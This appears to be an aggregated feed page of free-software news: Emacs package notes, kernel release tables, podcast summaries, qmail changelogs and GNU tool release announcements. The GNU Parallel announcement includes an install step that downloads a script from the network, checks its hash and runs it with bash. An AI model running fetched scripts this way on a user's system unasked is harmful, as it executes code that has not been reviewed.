We’re Wiki Workers United, a global solidarity union for the staff of the Wikimedia Foundation
Wikipedia editors plot strike and banner sabotage after Wikimedia layoffs
Comprehensive Response to Bambu’s AGPLv3 Violations – Software Freedom Conservancy
‘Fuck you, Bambu’: How one private message could change the face of 3D printing [archived]
Don’t expect a Raspberry Pi 5 in 2023, says Eben Upton [21st Dec 2022]
Introducing: Raspberry Pi 5! [28th Sep 2023]
Hello and welcome to my May 2026 free software activities report. A lot's been going on in my life offline so I took a bit of a hiatus from doing these reports, but I've had a fairly productive month of May so I thought it'd be nice to do another one for this month.
ffs package for
GNU Emacs on GNU ELPA. Many thanks to Protesilaos for rounds of
code review and feedback for improving and polishing the package
in preparation for submission to GNU ELPA.Somebody wants you to give them money
error due to the anti-bot challenge being served with a HTTP 402
(Payment Required) response. So I landed a patch 12eec781ed6 to
no longer do that. Thanks to Emacs comaintainer Sean Whitton
for reviewing and approving my proposed patch.<input type="submit">
HTML buttons, <button> elements were not tab-stoppable, leading
to poorer usability and accessibility. So I landed a patch
ec3d662de0b to fix that. Thanks to Emacs comaintainer Eli
Zaretskii for reviewing, providing feedback, and accepting my
proposed change.indicate-buffer-boundaries
and my convenience configuration macros.I've begun the work toward updating the Jami package in Debian unstable again, which means I need to package new releases of its direct and indirect dependencies. For OpenDHT, I need to update RESTinio, and to do that I first need to package expected-lite and sobjectizer for Debian:
I've been working on packaging both and hope to have them uploaded to the archive in the next days and weeks.
That's it for this month's report.
Take care, and so long for now.
| Version: | 6.6.142 (longterm) |
|---|---|
| Released: | 2026-06-01 |
| Source: | linux-6.6.142.tar.xz |
| PGP Signature: | linux-6.6.142.tar.sign |
| Patch: | full (incremental) |
| ChangeLog: | ChangeLog-6.6.142 |
| Version: | 6.1.175 (longterm) |
|---|---|
| Released: | 2026-06-01 |
| Source: | linux-6.1.175.tar.xz |
| PGP Signature: | linux-6.1.175.tar.sign |
| Patch: | full (incremental) |
| ChangeLog: | ChangeLog-6.1.175 |
| Version: | 5.15.209 (longterm) |
|---|---|
| Released: | 2026-06-01 |
| Source: | linux-5.15.209.tar.xz |
| PGP Signature: | linux-5.15.209.tar.sign |
| Patch: | full (incremental) |
| ChangeLog: | ChangeLog-5.15.209 |
| Version: | 5.10.258 (longterm) |
|---|---|
| Released: | 2026-06-01 |
| Source: | linux-5.10.258.tar.xz |
| PGP Signature: | linux-5.10.258.tar.sign |
| Patch: | full (incremental) |
| ChangeLog: | ChangeLog-5.10.258 |
Launch applications and interact with the desktop using mouse gestures at an entirely new level with Kando.
Nexis lets you manage processes, applications, packages, and disk health with a single tool. We'll help you get started.
This month we explore Solus 4.9, RakuOS 2026.04.15, Trisquel 12.0, and iDeal OS 2026.04.03.
A recent FCC decision won't allow new authorizations for foreign-made consumer routers to be sold in the US.
Keeping Linux machines in a known state requires a configuration management system. Discover how pyinfra simplifies this task with Python's full programming power.
Bottles lets you run Windows apps and games on Linux in clean, isolated environments without dual-booting.
Docker containers and Kubernetes pods might not be as airtight as you think. We'll show you three potential attacks.
Remember the old days when you could buy software and they gave you a permanent copy of the files on a shrink-wrapped CD? It was primitive, but at least you knew what you were getting, and you could rest assured that your new purchase would remain in your cupboard until you or one of your heirs decided to throw it away. The new service-based Internet was sold to the public as a convenience, but under the surface, it made consumer decisions even more complicated and challenged our assumptions about what it even means to "buy" or "own."
Mike Schilli's new home rooftop weather station continuously provides sun, wind, and rain data. High time to create a custom analysis program.
Valve's compatibility layer has transformed the open source platform into a serious gaming contender.
We'll show you some best practices for introducing Claude Code (or another LLM-based coding assistant) while maintaining knowledge and control of the code.
AI is here to stay, and understanding how it works under the hood can mean the difference between frustration and genuinely useful results. This article covers LLM fundamentals, effective prompting, and a structured agentic workflow that puts you in control.
This month in Linux Voice and Elvie.
Exploiting Layer 4 protocol handshakes and the resource limits of Layer 7.
This month, we explore the top FOSS, including a popular BitTorrent Client, a modern 8-bit game, and a slick web browser.
The Fischertechnik Maker Kit Bionic lets you enter the world of walking robots. We'll show you what it takes to bring this robot to life.
In the news: Fedora 44 Gaming Ready; Manjaro 26.1 Preview; Microsoft Issues Warning About Linux Vulnerability; Is AI Coming to Your Ubuntu Desktop?; Framework Laptop 13 Pro Competes with the Best; Latest CachyOS Features Supercharged Kernel; Kernel 7.0 Is a Bit More Rusty; and France Says "Au Revoir" to Microsoft.
The core of an immutable system cannot be changed, but you can bend that rule by overlaying your own stuff using a nifty systemd feature called SysExt.
Use common logic with DIP switches to determine functionality, IP addresses, hostnames, and other functional differences on repetitive hardware arrangements.
This month in Kernel News, AI hunts for linux bugs.
Qualys has discovered a vulnerability in the Linux kernel that can be used to elevate standard user privileges.
I can confirm that. A NUC is a very good choice for OWRX(+).
I am also running an Intel NUC5i3 with an RSPdx, an AirSpy HF+, and an RTL-SDR V4.
I have taken my Raspberry Pi out of service.
Regards, Steffen
What makes a good library?
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
What makes a good library?
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Well, if 10 people are sitting on a table, a normal conversation
is no longer possible:
Everyone steps up by 3, 6 or even 10 dB.
--> in the end, all of them are "pirates".
Looks interesting.
Is your scale "calibrated" in dBm?
For WFM, however, the (peak) deviation is essential since
commercial stations frequently work with
excessive values >> 50 kHz and often more than 100 kHz.
There are, indeed, some supervisors in some countries, and they do
dispose of professional
equipment.
However, sometimes, I think, they are Trump-followers and are
dozing, drowsing, snoozing, catnapping
and maundering - the usual occurrence in many public services...
73, Wolfgang
A test release of GNUtrition, 0.33.0rc4, is now available.
GNUtrition is free nutrition analysis software. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.
This release improves how user ages are stored and used by GNUtrition. You no longer need to manually update your age every year on (or near) your birthday. Thankfully, no database changes/migrations are necessary for this, you just need to enter your birthday and you will be good to go!
More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/. This test release can be obtained from the alpha.gnu.org server at one of the following:
ftp://alpha.gnu.o ... g/gnu/gnutrition/
http://alpha.gnu. ... g/gnu/gnutrition/
https://alpha.gnu ... g/gnu/gnutrition/
Please report any problems you experience to the GNUtrition bug reports mailing list: bug-gnutrition@gnu.org (https://lists.gnu ... fo/bug-gnutrition).
It’s a Linux Dev Time style hot questions episode. Is “cloud native” more about where the workload is going or how you deploy it? What is a skill that is really important in your job that may surprise people? Is the cloud more or less secure than a company-controlled data centre or on-prem? Would you recommend what you do to your kids/nephews etc?
Support us on patreon and get an ad-free RSS feed with early episodes sometimes
Subscribe to the RSS feed.
A test release of GNUtrition, 0.33.0rc3, is now available.
GNUtrition is free nutrition analysis software written for the GNU operating system. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.
This release removes a number of dependencies that broke building/installing on various systems. You no longer need to have a full LibreOffice, ncurses, SQLite, or LaTeX/TexInfo install to build and install GNUtrition.
More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/. This test release can be obtained from the alpha.gnu.org server at one of the following:
ftp://alpha.gnu.o ... g/gnu/gnutrition/
http://alpha.gnu. ... g/gnu/gnutrition/
https://alpha.gnu ... g/gnu/gnutrition/
Please report any problems you experience to the GNUtrition bug reports mailing list: bug-gnutrition@gnu.org (https://lists.gnu ... fo/bug-gnutrition).
It looks like Bitlocker had a back door in it, how a listener accidentally broke Gitea for users of the snap version, Google accidentally published an unpatched exploit for Chromium-based browsers, why people are starting to ditch Bitwarden, and moving a tech stack away from large corporations.
Plugs
Support us on patreon and get an ad-free RSS feed with some early episodes
How Klara and TrueNAS fixed ZFS’s longest standing limitation
Webinar: June 25th @ 11am EDT: Understanding AnyRAID with Jon from HexOS
News/discussion
YellowKey Bitlocker Bypass Vulnerability
Microsoft shares mitigation for YellowKey Windows zero-day
How I Broke Gitea for Everyone
Google publishes exploit code threatening millions of Chromium users
The Quiet Renovation at Bitwarden
Free consulting
We were asked about moving a tech stack away from large corporations.
GNU Parallel 20260522 ('Hantavirus') has been released. It is available for download at: lbry://@GnuParallel:4
Quote of the month:
...and GNU Parallel is fun.
-- DJviolin@reddit
New in this release:
GNU Parallel - For people who live life in the parallel lane.
If you like GNU Parallel record a video testimonial: Say who you are, what you use GNU Parallel for, how it helps you, and what you like most about it. Include a command that uses GNU Parallel if you feel like it.
GNU Parallel is a shell tool for executing jobs in parallel using one or more computers. A job can be a single command or a small script that has to be run for each of the lines in the input. The typical input is a list of files, a list of hosts, a list of users, a list of URLs, or a list of tables. A job can also be a command that reads from a pipe. GNU Parallel can then split the input and pipe it into commands in parallel.
If you use xargs and tee today you will find GNU Parallel very easy to use as GNU Parallel is written to have the same options as xargs. If you write loops in shell, you will find GNU Parallel may be able to replace most of the loops and make them run faster by running several jobs in parallel. GNU Parallel can even replace nested loops.
GNU Parallel makes sure output from the commands is the same output as you would get had you run the commands sequentially. This makes it possible to use output from GNU Parallel as input for other programs.
For example you can run this to convert all jpeg files into png and gif files and have a progress bar:
parallel --bar convert {1} {1.}.{2} ::: *.jpg ::: png gif
Or you can generate big, medium, and small thumbnails of all jpeg files in sub dirs:
find . -name '*.jpg' |
parallel convert -geometry {2} {1} {1//}/thumb{2}_{1/} :::: - ::: 50 100 200
You can find more about GNU Parallel at: http://www.gnu ... rg/s/parallel/
You can install GNU Parallel in just 10 seconds with:
$ (wget -O - pi.dk/3 || lynx -source pi.dk/3 || curl pi.dk/3/ || \
fetch -o - http://pi.dk/3 ) > install.sh
$ sha1sum install.sh | grep c555f616391c6f7c28bf938044f4ec50
12345678 c555f616 391c6f7c 28bf9380 44f4ec50
$ md5sum install.sh | grep 707275363428aa9e9a136b9a7296dfe4
70727536 3428aa9e 9a136b9a 7296dfe4
$ sha512sum install.sh | grep b24bfe249695e0236f6bc7de85828fe1f08f4259
83320d89 f56698ec 77454856 895edc3e aa16feab 2757966e 5092ef2d 661b8b45
b24bfe24 9695e023 6f6bc7de 85828fe1 f08f4259 6ce5480a 5e1571b2 8b722f21
$ bash install.sh
Watch the intro video on http://www.youtub ... L284C9FF2488BC6D1
Walk through the tutorial (man parallel_tutorial). Your command line will love you for it.
When using programs that use GNU Parallel to process data for publication please cite:
O. Tange (2018): GNU Parallel 2018, March 2018, https://doi.org/1 ... 81/zenodo.1146014.
If you like GNU Parallel:
If you use programs that use GNU Parallel for research:
If GNU Parallel saves you money:
GNU sql aims to give a simple, unified interface for accessing databases through all the different databases' command line clients. So far the focus has been on giving a common way to specify login information (protocol, username, password, hostname, and port number), size (database and table size), and running queries.
The database is addressed using a DBURL. If commands are left out you will get that database's interactive shell.
When using GNU SQL for a publication please cite:
O. Tange (2011): GNU SQL - A Command Line Tool for Accessing Different Databases Using DBURLs, ;login: The USENIX Magazine, April 2011:29-32.
GNU niceload slows down a program when the computer load average (or other system activity) is above a certain limit. When the limit is reached the program will be suspended for some time. If the limit is a soft limit the program will be allowed to run for short amounts of time before being suspended again. If the limit is a hard limit the program will only be allowed to run when the system is below the limit.
Debian’s ambitious aim to make all packages reproducible pushes us closer to a better future, yet more talk about age verification for VPNs, Firefox gets more users on mobile thanks to regulation, Opera’s gaming browser comes to Linux, Valve releases CAD files for the Steam Controller, and the Steam Frame might be coming soon. With guest host Andy from Linux Dev Time.
News/discussion
Debian Release Team: Debian Must Now Ship Reproducible Packages
EU calls VPNs “a loophole that needs closing” in age verification push
EU browser choice rules send millions more users Firefox’s way
In the recent weeks I've been engaging Prot as a coach to help review
my new ffs package for GNU Emacs as I worked on preparing it for
inclusion in GNU ELPA, as well as discussing other Emacs- and
life-related topics.
UPDATE 2026-05-23 22:39:15 -0400: Prot also published an article about our session on his website: https://protesilaos.com/commentary/2026-05-23-life-issues-and-philosophy-amin-bandali/
In our nearly 2-hour conversation, we discussed at length and in depth various aspects of life in the current times. For instance, feeling overwhelmed in the face of innumerable things happening at once, with technology changing our perception and making events feel proximate and imminent.
We talked about seasonality and rhythms in life, including in relation to burnout and knowing our own limitations, and descriptive vs prescriptive thinking when reflecting on the expectations we may place on our self when comparing our self to others through the lens of our necessarily-incomplete impressions and glimpses of their lives. We discussed absence or loss as a dual to presence or persistence in the process of life. How with our memories and through embodying the philosophy and teachings of departed loved ones their essence and legacy continues to live on within us. But also loss in the sense of us losing parts of our self in life-defining moments while preserving other parts and gaining new ones, being liberated of some of the burdens of our past self and in effect becoming someone else in the process.
In being true to our self, we talked about humans as multi-faceted beings and the importance of expressing and giving a voice to these different aspects of our self, and keeping alive that child-like sense of awe and wonder. To live a life where the pace and rhythms of our environment are in sync with our internal rhythms, and to not give others undue power over us or our happiness through trying to live according to their prescribed standards or expectations.
I also learned more about Prot's practical philosophy of situational awareness in life, not merely as a means for survival, but also as a way of appreciating all of the beauty that surrounds us, and a method for gaining the knowledge and skills to apply what we learn from patterns in one area of life to other areas.
We concluded our session with a mention to the concept of sanctity, to set aside a sacred time or place for our self wherein no distractions are allowed, where we can unwind, rest, and recharge for whatever comes next.
Here is the video recording of our session, which I share with Prot's permission:
You can view or download the full-resolution video from the Internet Archive.
Like Prot, I am invigorated and inspired to live a full, honest life. To do my best, do what I do in earnest, and make the best of what I have.
Take care, and so long for now.
We all seem to be moving away from Ubuntu, but there are still quite a few reasons to keep using it.
Charlie’s OggCamp talk about infrastructure as code
Support us on Patreon and get an ad-free RSS feed with some early episodes
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
Italian Linux Society ha attivato il nuovo conto in Banca Etica e iniziamo l'abbandono di Unicredit. I motivi.
Continua la lettura… (ulteriori 7 minuti di lettura)
Why a proposal for an alternative to IPv6 is unlikely to be viable, Microsoft really doesn’t want you to run Exchange Server on-prem, Google will finally stop being a proper search engine, setting up an email server for internal use, and mitigating DDoS attacks without Cloudflare.
Plugs
Support us on patreon and get an ad-free RSS feed with some early episodes
Webinar: May 27th at 11am EDT: Database Performance on ZFS with Tom Lawrence
News/discussion
Veteran network architect proposes IPv8 – to improve IPv4, not leapfrog v6
Exchange Server zero-day vulnerability can be triggered by opening a malicious email
Google Search as you know it is over
Free consulting
We were asked about setting up an email server for internal use, and mitigating DDoS attacks without Cloudflare.
ffs provides a minor mode for simple plain text presentations in
Emacs, where the slides are separated using the page-delimiter, by
default the form feed character (^L).
I wrote ffs in early 2022 for my LibrePlanet 2022 presentation the
Net beyond the Web, and earlier this year decided to polish it towards
being a proper package and submit it to GNU ELPA. The manual still
needs some more work, but the overall package is in pretty good shape
so I submitted for inclusion in GNU ELPA.
ffs
ffs and I owe a debt of gratitude to Protesilaos for rounds of
code review and feedback for improving and polishing the package in
preparation for submission to GNU ELPA. You can watch videos of these
sessions posted earlier on my website:
Further, inspiration for parts of ffs's implementation was
gratefully drawn from Protesilaos's Logos package for Emacs.
Dedicated to the loving memory of Farangis Yousefinia.
Below are the release notes.
First release of ffs on GNU ELPA.
The attempted build of ffs 0.2.1 within GNU ELPA build sandbox failed
with an Error: void-function (org-texinfo-kbd-macro) due to use of
#+macro: kbd (eval (org-texinfo-kbd-macro $1)) in ffs.org for better
formatting of key sequences in the exported Texinfo copy. This seems
to have happened for the specific case of generating a plain text
README using ox-ascii where ELPA didn't load ox-texinfo. To try
and mitigate this, a README.md has been added for use as the package
README instead of ffs.org. If not sufficient, a Texinfo copy of the
ffs manual will be shipped instead of the Org one in the next release.
ffs 0.2.2 also includes small fixes and improvements throughout
ffs.el from Stefan Monnier, and additional feedback to be addressed
in future releases.
The attempted build of ffs 0.2.0 within GNU ELPA build sandbox failed with a "Cannot include file" error on the "#+include: fdl.org" in the manual. So, as a workaround, we switch to using the official Texinfo copy of the GNU FDL license rather than an Org copy.
First release of ffs intended for GNU ELPA.
After a few years of inactivity, in early 2026 I decided to dust off
ffs.el, polish and document it, and offer for inclusion in GNU ELPA
as a proper package.
ffs-default-face-height changed to nil
To minimize unexpected and/or unnecessary changes out-of-the-box, the
default value of ffs-default-face-height has been changed to nil.
ffs-edit-buffer-name demoted from user option to variableThis is not an important user-facing setting, so to help avoid overwhelming users with many options, this has been demoted from a user option to a variable.
ffs's behaviour
As part of the effort to bring ffs more in line with the conventions
of other existing Emacs packages, the mechanisms for toggling various
parts of Emacs's interface to minimize visual clutter were changed
from being minor modes to being customizable user options. These are
the replacement new user options, with a default value of nil:
ffs-hide-cursorffs-hide-mode-lineffs-hide-header-line
Their value is buffer-local, and may be set globally using
setq-default. See the sample configuration in the manual for an
example of how to customize them.
The new ffs-page-delimiter user option defines the page delimiter
inserted by ffs-edit-done when inserting a new slide. Emacs's
page-delimiter regexp should be able to match ffs-page-delimiter's
value, so if you use a custom page-delimiter be sure to customize
ffs-page-delimiter accordingly.
The new ffs-echo-progress user option controls whether to display in
echo area the progress through the slides. When non-nil, changing
slides will also display the progress through the slides in the echo
area. The format of the displayed progress can be customized using
the new ffs-echo-progress-format user option.
The new ffs-edit-display-buffer-alist user option may be used to
control the Window configuration for the ffs-edit buffer. By
default, it will display the ffs-edit buffer in the same window.
The new ffs-edit-done-hook user option may be used to define hooks
to be run at the end of ffs-edit-done after returning to the main
ffs presentation buffer.
Lastly, a new ffs-find-speaker-notes-function variable was added to
allow customizing the find function used for opening the speaker's
notes file, defaulting to find-file-other-frame.
Initial publication of ffs.el as part of my personal configurations
for GNU Emacs.
My first attempt at this concept was a now-archived ffsanim.el,
a major mode implementation that used Emacs's animate library to
animate slide texts onto the screen. Shortly after realizing the
shortcomings of that approach, I abandoned it in favour a minor mode
implementation and published version 0.1.0 of what is now ffs in
my personal configs repository.
I used this implementation for presenting my LibrePlanet 2022 talk, The Net beyond the Web.
I picked "ffs" as the package name, the acronym for form feed slides.
Ubuntu Core 26 could be a game-changer for organizations looking for increased security and reliability.
OpenTelemetry (fondly known as OTel) is an open-source project that provides a unified set of APIs, libraries, agents, and instrumentation to capture and export logs, metrics, and traces from applications. The project’s goal is to standardize observability across various services and applications, enabling better monitoring and troubleshooting.
The post Using OpenTelemetry and the OTel Collector for Logs, Metrics, and Traces appeared first on Linux.com.
dovecot_config_version and dovecot_storage_version in dovecot.conflua as a dependency. Added --without-lua at configure commanduserdb iterate query nor orders by domain and username commitfts_autoindex = no added to Trash and Junk folders commit+ character added to auth_username_chars commitvpopmail configured with --disable-many-domainsRoundcube è una webmail avanzata con una bella interfaccia grafica.
$config['quota_zero_as_unlimited'] = true; to show quota unlimited instead of unknown for accounts with unlimited quota
qmailctlqmHandle, queue_repair and all scripts installed in QMAIL/bin and not in /usr/local/bin by config-all.shqmailctl script, DKIM control/filterargs and control/domainkeys dir, SURBL, smtpplugins, helodnscheck spp plugin, svtools, qmHandle, queue-repair, SSL key file (optional). Server Name Indication (SNI) è una estensione del protocollo TLS che consente a un server di presentare differenti certificati a seconda dell'hostname richiesto dal client durante il saluto TLS.
In un ambiente email moderno, molti domini condividono uno stesso indirizzo IP per i servizi SMTP, IMAP, POP3 e submission. Senza SNI, un amministratore di un server email può presentare un solo certificato per ogni socket disponibile, cosa che obbliga l'aministratore ad affidarsi a certificati multi-dominio (SAN) o a certificati con wildcard. Questo approccio aumenta i problemi operativi tra gli utenti finali novelli, che spesso non sono in grado di usare la configurazione automatica del client per configurare correttamente le loro mailbox.
L'abilitazione di SNI nei serivizi mail consente al server di presentare il certificato appropriato basato sull'hostname richiesto dal client, contenuto nel suo indirizzo email.
La funzionalità SNI per la mia distribuzione qmail è stata aggiunta da Andreas Gerstlauer (commit qui e qui), che vorrei ringraziare.
Clam AntiVirus is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways.
vpopmail: 5.6.13Vpopmail fornisce un modo semplice di gestire indirizzi di posta su domini virtuali e account email diversi da quelli su /etc/passwd.
vmysql.c changes (#10)
valias_create_table now check if table is already created in order to avoid warnings in dotqmail2valiasvalias_insert functionqmailadmin calls in #9s/qmail users (look here)--enable-defaultdelivery) changes (more info here, commit):
vdelivermail is installed by default in .qmail-default of newly created domains with option 'delete' as in the previous version.vdelivermail, to avoid loops.VqAdmin è un pannello di controllo su interfaccia web che consente di eseguire azioni che richiedono l'accesso a root — per esempio, aggiungere e cancellare domini.
Come si può vedere, VqAdmin ha una nuova versione con un nuovo aspetto mobile responsive, con tutte le mie vecchie patch incluse (compresa quella di ALI) e diverse correzioni e ripuliture del codice sorgente. Ho risolto tutti i warnings sia di autotools che di gcc e cambiato un paio di cose per poter rifare il tema html (guardare il changelog per maggiori dettagli). Come sempre i contributi nei commenti sono graditi.
PS: anche la parte apache è stata modificata e prima di fare l'aggiornamento è necessario guardare quali modifiche sono necessarie.
Have fun!
Questa pagina riguarda la patch DKIM inclusa nella mia patch combinata (maggiori informazioni qui). Questo argomento è avanzato ed è consigliabile tornare qui alla fine del tutto.
DKIM fornisce un metodo per validare l'identità di un nome a dominio associato a un messaggio con una autenticazione crittografata. La tecnica di validazione è basata sulla crittografia di una chiave pubblica: Il server che invia l'email aggiunge il nome a dominio al messaggio e vi affigge una firma digitale. Questa chiave è posta nell'intestazione DKIM-Signature: del messaggio. Colui che riceve il messaggio può controllare la validità della chiave pubblica leggendo un record TXT del DNS del dominio associato al messaggio.
Sei invitato a dare un'occhiata alle pagine man a partire da qmail-dkim(8) e spawn-filter(8).
ERROR_FD=2 in control/filterargs to send error output of qmail-dkim in stderr when acting as a qmail-remote filter (Andreas Gerstlauer)ed25519 support (RFC 8463)DKIMSIGN / DKIMSIGNEXTRA / DKIMSIGNOPTIONS DKIMSIGNOPTIONSEXTRA variablesdomainkey script replaced by dknewkey in order to create ed25519 keys and rsa keys with 1024/2048/4096 bitlibdomainkeys.a library)rsa key together with the ed25519 key below.
qmail-sppprovides plug-in support for qmail-smtpd. It allows you to write external programs and use them to checkSMTPcommand argument validity. The plug-in can trigger several actions, like denying a command with an error message, logging data, adding a header and much more.
Today I played for the first time with an ancient patch for qmail: qmail-spp. I was really impressed for the ease of use and the elegance of its code, which is inserted inside qmail-smtpd.c with a few touches, despite of the many things that it can do when installed and enabled.
It can run a custom plugin in any language and at any level of the smtp session, grabbing the environment variables, writing into stderr or blocking the smtp session with a return error for the sender.
In no time at all I managed to understand its logic and write a small plugin by adapting a c program I wrote for s/qmail a few months ago to check the validity of the recipient.
Of course I decided to add this patch to my combo. I've just modified the way it has to be enabled, just not to bother those who don't want to touch their run scripts. So, while the original patch is enabled by default, I modified things a little bit so that you have to manually enable it by exporting the variable ENABLE_SPP in your run scripts. Therefore the original NOSPP variable is useless.
Have fun!
Ora che abbiamo preparato i filtri antispam dobbiamo addestrare il nostro sistema bayesiano e inviare i report a Razor, Pyzor e Spamcop.
La cosa più ovvia che può venirci in mente di fare a questo punto è forse quella di lanciare sa_learn e spamassassin --report uno dopo l'altro al click sul bottone "Marca come Spam" della webmail Roundcube (vedere i driver cmd_learn e multi_driver del plugin markasjunk), ma questa scelta ha alcuni svantaggi importanti:
E' qundi più corretto eseguire questi due compiti durante la notte per mezzo di un cronjob (primo problema risolto), processando i soli messaggi di vero spam/ham che l'utente ha consapevolmente copiato in una cartella apposita (secondo problema).
Tired of the nightmares of remotely compiling the kernel with Linux-VServer, a software that I'm pleased with despite of some lack of documentation, these days I was playing with LXC, which is included and supported by Slackware and for which the Linux kernel doesn't need any patching because it already embeds the hacks for LXC containers.
To convert an existing Linux-VServer container in a (eventually unprivileged) LXC container you can follow these steps. I assume that you already know how to create an LXC container; in case you are interested in unprivileged containers take a look to the excellent Chris Willing's guide (a big thanks to him) linked below.
More info:
Era ora che riuscissi a liberarmi della vecchia piattaforma Drupal come strumento per questo blog, ma finalmente ho trovato il tempo per migrare il database di Drupal e per riprendere qui la vecchia grafica (solo lo stile, il codice html è mio).
D'altronde, da almeno 15 anni porto avanti lo sviluppo di un mio CMS (basato su php/mariadb), che però originariamente non avevo usato per la mancanza del tempo necessario a costruirmi un tema html.
Ora il sito vive in ambiente Mobile Responsive e soprattutto mi consente di svincolarmi dagli incubi degli aggiormanti di Drupal e dei suoi pacchetti.
La parte sui commenti del presente CMS non è perfettamente collaudata e mi farebbe piacere avere eventualmente dei feedback su ogni problematica, quindi non esitate a scrivermi al riguardo.
Buon divertimento!
Massive Christmas present by my italian friend Luca Franceschini of digitalmind. He merged his combo with my combined patch (2016.12.02 version) adding several (heavily customized) patches and functionalities. Luca is a C programmer and an expert system administrator who manages big servers.
AI is giving Linus Torvalds a headache, but not in the way you might think.
Files by age, newest first:
ls -lt
Docker images by age, newest first:
docker images --format "{{.CreatedAt}}\t{{.Repository}}:{{.Tag}}" | sort -r
Files by size, largest first:
ls -lS
Docker images by size, largest first:
docker images --format "{{.Size}}\t{{.Repository}}:{{.Tag}}" | sort -rh
Why why why??!
Professional fulfillment tops the list, according to LPI report.
Great funding news for LVFS and KDE, why Europe probably needs some more home-grown distros, a conspiracy theory about Cloudflare seems unlikely, and we wonder what can be done about all the irresponsibly disclosed vulnerabilities that new tools are discovering. With guest host Andy from Linux Dev Time.
News
Sovereign Tech Fund invests over €1 million in KDE software development
KDE bags €1.3M as Europe realizes it might need an OS of its own
Can Someone Please Explain Whether Cloudflare Blackmailed Canonical?
‘Dirty Frag’ Linux flaw one-ups CopyFail with no patches and public root exploit
Dirty Frag gets a sequel as Fragnesia hands Linux attackers root-level access
Linux kernel maintainers pitch emergency killswitch after CopyFail and Dirty Frag chaos
Andy has been taking the One Billion Row Challenge, and has been thinking about the broader question of what makes software fast.
Andy’s videos on Peertube and YouTube.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Andy has been taking the One Billion Row Challenge, and has been thinking about the broader question of what makes software fast.
Andy’s videos on Peertube and YouTube.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
We get into some homelab updates. Sean has been consolidating hardware, Gary has been implementing high availability with Proxmox, and Shane has been working hard to get Home Assistant working with Kubernetes, as well as downloading YouTube videos.
Support us on patreon and get an ad-free RSS feed with early episodes sometimes
Subscribe to the RSS feed.
In the recent weeks I've been engaging Prot as an Emacs coach to help
with doing review passes over my upcoming ffs package as I work on
polishing and documenting it in preparation for offering it for
inclusion in GNU ELPA.
UPDATE 2026-05-15 08:50:10 -0400: Prot also published an article about our session on his website: https://protesilaos.com/codelog/2026-05-15-emacs-amin-bandali-ffs-display-buffer-org-capture/
Today we had our third session where we started by reviewing and
talking about my recent changes to ffs, then ventured to other
Emacs-related topics with the overarching theme of the flexibility
and extensibility of GNU Emacs, including display-buffer-alist,
keyboard macros, defining a custom ox-bhtml Org export backend
derived from Org's ox-html for ultimate flexibility when exporting
my site's pages from Org to HTML, Org capture, plain text files and
Emacs's diary and how it compares to org-agenda, and keeping a
journal with the help of Emacs.
Here is the video recording of our session, which I share with Prot's permission:
You can view or download the full-resolution video from the Internet Archive.
Lastly, here is the snippet Prot shared for having Isearch treat space as a wildcard, helpful for more easily matching multiple parts of a line:
(setq search-whitespace-regexp ".*?")
(setq isearch-lax-whitespace t)
(setq isearch-regexp-lax-whitespace nil)
Take care, and so long for now.
People trying to return defective hard drives and RAM are finding out why consumer protection laws would be good, GoDaddy accidentally gave someone’s domain name away, and when and how to fix ZFS fragmentation.
Plugs
Support us on patreon and get an ad-free RSS feed with some early episodes
Fast Dedup Economics: When Deduplication Beats Buying New Disks
News/discussion
GoDaddy Gave a Domain to a Stranger Without Any Documentation
Free consulting
We were asked about when and how to fix ZFS fragmentation.
Fedora Hummingbird brings the same approach to the host OS as it does to containers to level up security.
A test release of GNUtrition, 0.33.0rc2, is now available.
GNUtrition is free nutrition analysis software written for the GNU operating system. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.
This release makes some fixes to the gender option. It also applies a fix to ./version.sh that affected builds from CVS checkouts, which was not an issue with the tarball, due to the tarballs including the version in a .ver file.
More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/. This test release can be obtained from the alpha.gnu.org server at one of the following:
Please report any problems you experience to the GNUtrition bug reports mailing list: <bug-gnutrition@gnu.org> (https://lists.gnu ... fo/bug-gnutrition).
With the rise of Linux vulnerabilities, the kernel developers are now considering adding a component that could help temporarily mitigate against them… in the form of a kill switch.
Light bulb colour temperatures, doing nice things for ourselves, pulling faces while playing guitar, and surreal experiences. With Allan from 2.5 Admins, May from Linux After Dark, and Shane from Hybrid Cloud Show.
Patrons got this this in their feed two weeks ago.
The latest version of Fedora has been released with gaming support.
When offered the option to run other people’s code, a prime
consideration is often ease of deployment. While much progress has been
made in support of rapid deployment, the security implications of those
quick deployments is often overlooked. In this post, we look at a new
feature of guix time-machine and guix pull in support of one-line
deployment commands: the ability to download channel files, but without
compromising on security.
The normal workflow to share software and make it easily deployable with Guix goes like this: someone puts their packager hat on and writes a package definition, adds it to Guix proper or to a separate channel, at which point anyone can fetch the relevant channel(s) and deploy the software.
As an example, let’s assume you want to run
yt-dlp as packaged in
the latest Guix revision without upgrading your system or going through
an explicit installation step. The simplest way to do that is with this
command:
guix time-machine -q -- shell yt-dlp -- yt-dlp …If you’re familiar with Nix, this is equivalent—with some important differences we’ll discuss below—to this command:
nix shell nixpkgs#yt-dlp --command yt-dlp …In both cases, we’re fetching the latest revision of the package
collection (the master branch for Guix, the nixpkgs-unstable branch
of Nixpkgs for Nix) and running yt-dlp from there. (nix run
goes one step further by removing the need to specify the command name.)
Now, that was an easy example because yt-dlp comes from Guix itself.
What if you’d like to deploy an application that’s in another channel
such as Guix-Science?
Well, you would first need to come up with a channels.scm file for
Guix-Science and then you
can pass it to guix pull or guix time-machine:
$EDITOR channels.scm
# Make sure that includes Guix-Science.
